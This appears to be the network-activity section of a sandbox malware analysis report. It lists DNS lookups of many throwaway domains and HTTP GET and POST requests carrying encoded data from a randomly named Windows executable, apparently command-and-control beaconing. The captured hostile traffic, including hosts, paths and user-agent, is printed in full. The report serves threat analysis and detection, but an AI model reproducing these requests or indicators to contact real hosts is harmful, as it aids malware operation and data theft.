                                                                    Jan 3, 2025 11:42:29.400860071 CET5004580192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:29.732765913 CET5004580192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:30.748269081 CET5004680192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:30.753185987 CET805004613.228.81.39192.168.2.4
                                                                    Jan 3, 2025 11:42:30.753243923 CET5004680192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:30.764127970 CET5004680192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:30.768975019 CET805004613.228.81.39192.168.2.4
                                                                    Jan 3, 2025 11:42:31.691340923 CET805004613.228.81.39192.168.2.4
                                                                    Jan 3, 2025 11:42:31.691369057 CET805004613.228.81.39192.168.2.4
                                                                    Jan 3, 2025 11:42:31.693059921 CET5004680192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:31.697011948 CET5004680192.168.2.413.228.81.39
                                                                    Jan 3, 2025 11:42:31.701801062 CET805004613.228.81.39192.168.2.4
                                                                    Jan 3, 2025 11:42:37.178348064 CET5004780192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:37.183154106 CET8050047154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:37.190783024 CET5004780192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:37.250813007 CET5004780192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:37.255713940 CET8050047154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:38.776295900 CET5004780192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:38.823244095 CET8050047154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:39.796988964 CET5004880192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:39.801924944 CET8050048154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:39.802845955 CET5004880192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:39.854240894 CET5004880192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:39.859069109 CET8050048154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:41.370251894 CET5004880192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:41.419265032 CET8050048154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.397912025 CET5004980192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:42.403104067 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.403177977 CET5004980192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:42.433321953 CET5004980192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:42.438218117 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438231945 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438247919 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438271046 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438354969 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438364029 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438373089 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438399076 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:42.438441992 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:43.950798988 CET5004980192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:43.999226093 CET8050049154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:44.967056990 CET5005080192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:44.971983910 CET8050050154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:44.972042084 CET5005080192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:44.984601021 CET5005080192.168.2.4154.39.239.237
                                                                    Jan 3, 2025 11:42:44.989553928 CET8050050154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:58.572101116 CET8050047154.39.239.237192.168.2.4
                                                                    Jan 3, 2025 11:42:58.572151899 CET5004780192.168.2.4154.39.239.237

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 3, 2025 11:39:42.526709080 CET5778953192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:39:42.554909945 CET53577891.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:39:59.238432884 CET5152553192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:39:59.292108059 CET53515251.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:40:12.560419083 CET6064453192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:40:12.573307037 CET53606441.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:40:26.044958115 CET5613453192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:40:26.359828949 CET53561341.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:40:39.936544895 CET4941653192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:40:39.948384047 CET53494161.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:40:53.248677015 CET6491453192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:40:53.616429090 CET53649141.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:41:06.936558962 CET6491153192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:41:06.983355999 CET53649111.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:41:20.139514923 CET6258553192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:41:20.584656000 CET53625851.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:41:34.170521021 CET5563553192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:41:34.193356991 CET53556351.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:41:48.483963966 CET5551453192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:41:48.503921032 CET53555141.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:42:01.702132940 CET5119353192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:42:01.711157084 CET53511931.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:42:09.782705069 CET5224753192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:42:09.848511934 CET53522471.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:42:23.031011105 CET6364453192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:42:23.063174009 CET53636441.1.1.1192.168.2.4
                                                                    Jan 3, 2025 11:42:36.703308105 CET6097953192.168.2.41.1.1.1
                                                                    Jan 3, 2025 11:42:37.162441969 CET53609791.1.1.1192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 3, 2025 11:39:42.526709080 CET192.168.2.41.1.1.10xd110Standard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:39:59.238432884 CET192.168.2.41.1.1.10x55ccStandard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:12.560419083 CET192.168.2.41.1.1.10x3435Standard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:26.044958115 CET192.168.2.41.1.1.10xbb00Standard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:39.936544895 CET192.168.2.41.1.1.10xba83Standard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:53.248677015 CET192.168.2.41.1.1.10x2284Standard query (0)www.investshares.netA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:06.936558962 CET192.168.2.41.1.1.10x6f91Standard query (0)www.nosolofichas.onlineA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:20.139514923 CET192.168.2.41.1.1.10x8171Standard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:34.170521021 CET192.168.2.41.1.1.10xde3bStandard query (0)www.adadev.infoA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:48.483963966 CET192.168.2.41.1.1.10x8f4eStandard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:01.702132940 CET192.168.2.41.1.1.10x3528Standard query (0)www.ebsmadrid.storeA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:09.782705069 CET192.168.2.41.1.1.10x2ae3Standard query (0)www.denture-prices.clickA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:23.031011105 CET192.168.2.41.1.1.10x333eStandard query (0)www.sonixingenuine.shopA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:36.703308105 CET192.168.2.41.1.1.10xb84Standard query (0)www.moyu19.proA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 3, 2025 11:39:42.554909945 CET1.1.1.1192.168.2.40xd110No error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:39:59.292108059 CET1.1.1.1192.168.2.40x55ccNo error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 3, 2025 11:39:59.292108059 CET1.1.1.1192.168.2.40x55ccNo error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:12.573307037 CET1.1.1.1192.168.2.40x3435No error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:12.573307037 CET1.1.1.1192.168.2.40x3435No error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:26.359828949 CET1.1.1.1192.168.2.40xbb00No error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:26.359828949 CET1.1.1.1192.168.2.40xbb00No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:26.359828949 CET1.1.1.1192.168.2.40xbb00No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:39.948384047 CET1.1.1.1192.168.2.40xba83No error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:40:53.616429090 CET1.1.1.1192.168.2.40x2284No error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:06.983355999 CET1.1.1.1192.168.2.40x6f91No error (0)www.nosolofichas.onlinenosolofichas.onlineCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:06.983355999 CET1.1.1.1192.168.2.40x6f91No error (0)nosolofichas.online84.32.84.32A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:20.584656000 CET1.1.1.1192.168.2.40x8171No error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:20.584656000 CET1.1.1.1192.168.2.40x8171No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:20.584656000 CET1.1.1.1192.168.2.40x8171No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:34.193356991 CET1.1.1.1192.168.2.40xde3bNo error (0)www.adadev.info47.83.1.90A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:48.503921032 CET1.1.1.1192.168.2.40x8f4eNo error (0)www.cifasnc.info188.114.97.3A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:41:48.503921032 CET1.1.1.1192.168.2.40x8f4eNo error (0)www.cifasnc.info188.114.96.3A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:01.711157084 CET1.1.1.1192.168.2.40x3528Name error (3)www.ebsmadrid.storenonenoneA (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:09.848511934 CET1.1.1.1192.168.2.40x2ae3No error (0)www.denture-prices.click199.59.243.228A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:23.063174009 CET1.1.1.1192.168.2.40x333eNo error (0)www.sonixingenuine.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:23.063174009 CET1.1.1.1192.168.2.40x333eNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:23.063174009 CET1.1.1.1192.168.2.40x333eNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                    Jan 3, 2025 11:42:37.162441969 CET1.1.1.1192.168.2.40xb84No error (0)www.moyu19.pro154.39.239.237A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.gayhxi.info
                                                                    • www.promocao.info
                                                                    • www.grimbo.boats
                                                                    • www.44756.pizza
                                                                    • www.lonfor.website
                                                                    • www.investshares.net
                                                                    • www.nosolofichas.online
                                                                    • www.jrcov55qgcxp5fwa.top
                                                                    • www.adadev.info
                                                                    • www.cifasnc.info
                                                                    • www.denture-prices.click
                                                                    • www.sonixingenuine.shop
                                                                    • www.moyu19.pro

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.44973647.83.1.90801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:39:42.580204010 CET466OUTGET /k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.gayhxi.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:39:44.158767939 CET139INHTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 03 Jan 2025 10:39:44 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.44977384.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:39:59.349128008 CET734OUTPOST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4f 6e 42 37 69 32 52 56 63 4b 2b 58 71 6c 39 6e 53 38 6a 7a 43 5a 61 50 4a 31 42 51 48 56 63 7a 67 3d 3d
                                                                    Data Ascii: 1V=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.44978884.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:02.007220030 CET754OUTPOST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 39 70 53 4f 38 31 64 45 6f 56 6f 69 38 36 63 46 62 6e 75 5a 41 73 48 6b 6e 6e 70 35 31 44 5a 49 55 3d
                                                                    Data Ascii: 1V=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC9pSO81dEoVoi86cFbnuZAsHknnp51DZIU=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.44980584.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:04.561172962 CET10836OUTPOST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 79 42 55 59 70 59 74 7a 46 44 7a 44 70 59 4f 76 4d 64 53 57 41 7a 77 68 77 50 62 58 2f 6d 36 35 51 69 46 6e 43 52 30 62 31 36 46 4e 69 4d 55 6b 36 5a 39 71 39 36 59 54 32 5a 49 6d 55 68 51 61 47 4f 33 6e 69 55 6b 30 6b 76 52 6e 6a 51 5a 76 70 36 68 4d 69 39 7a 4c 50 30 7a 48 66 55 6d 6e 62 70 49 5a 46 77 70 6b 73 53 34 57 36 62 54 37 2b 57 33 30 34 51 52 71 78 58 32 50 67 33 37 38 55 4d 38 6c 68 7a 6b 77 69 37 58 57 46 64 5a 35 70 70 61 31 56 61 2f 47 71 56 71 5a 64 6c 54 79 44 4e 75 4e 6c [TRUNCATED]
                                                                    Data Ascii: 1V=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd+yBUYpYtzFDzDpYOvMdSWAzwhwPbX/m65QiFnCR0b16FNiMUk6Z9q96YT2ZImUhQaGO3niUk0kvRnjQZvp6hMi9zLP0zHfUmnbpIZFwpksS4W6bT7+W304QRqxX2Pg378UM8lhzkwi7XWFdZ5ppa1Va/GqVqZdlTyDNuNlSE7xf8F6tVh2Ra7HC0d+pWfBc6vrl+YsAx/u1LDh4cKUByHPssXdGxrldcr7B6K1629XFE72IlwtdFIcsb7vnw1yjcJ0HSpVJi897CkdzI/zwUn0OFuTyv4LRRdH5dHNMkg0EezYzTjb/U6FNPRTMMJKi5lzMhfK1FrPRGliAUx/6cN99WTrbx3psfo8aUuw7wax+EUu6kfB70nukuerBPx7tIz7EOdznTmoZdpqgzwIrq4eNpt6ZRhdHIaM+8SvbMYmjXdFg0d4s/Najr1UhD3t3qBmx8Oj6CJkvHuPUatGaxvXY51/iWiPTJbHwJEBFVzJAVc6PFIfsQBq0jzai8vDBupHFRxWuBp8GJ95FMwJqeEo+YyrcAJcjVQua/Cz3MIbVnRiUiiyZw2ceq+QTv6F/l5WPBj8GYhs5cArWMXbyb8PSsUTKSyLW310PbZs7AFKjAendXg2NY1H5XysE43Y8fSZ4FCDLhjvclx8EfMjn7w2zVrPX7IAoXeZq9adtVIEN1Bxa3vTpI958L3ASe6msFjct4vQZcwLJwCFKHqO96t4sNREgibBPFxjVDqTSm3ER61B6+ZmFh6e9AKNXxMxWPj8s1SETNye+lCV0CcriW9SxKQcvVbKTaGxfMM5KklqDGTXCTHgvXQJduOLsKf5vjQlMuZAv4 [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.44982484.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:07.103847027 CET468OUTGET /zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.promocao.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:07.550666094 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 03 Jan 2025 10:40:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: f35d08198c93f120a5f50d757b8cd87c-bos-edge1
                                                                    Expires: Fri, 03 Jan 2025 10:40:06 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                    Jan 3, 2025 11:40:07.550678968 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                    Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                    Jan 3, 2025 11:40:07.550690889 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
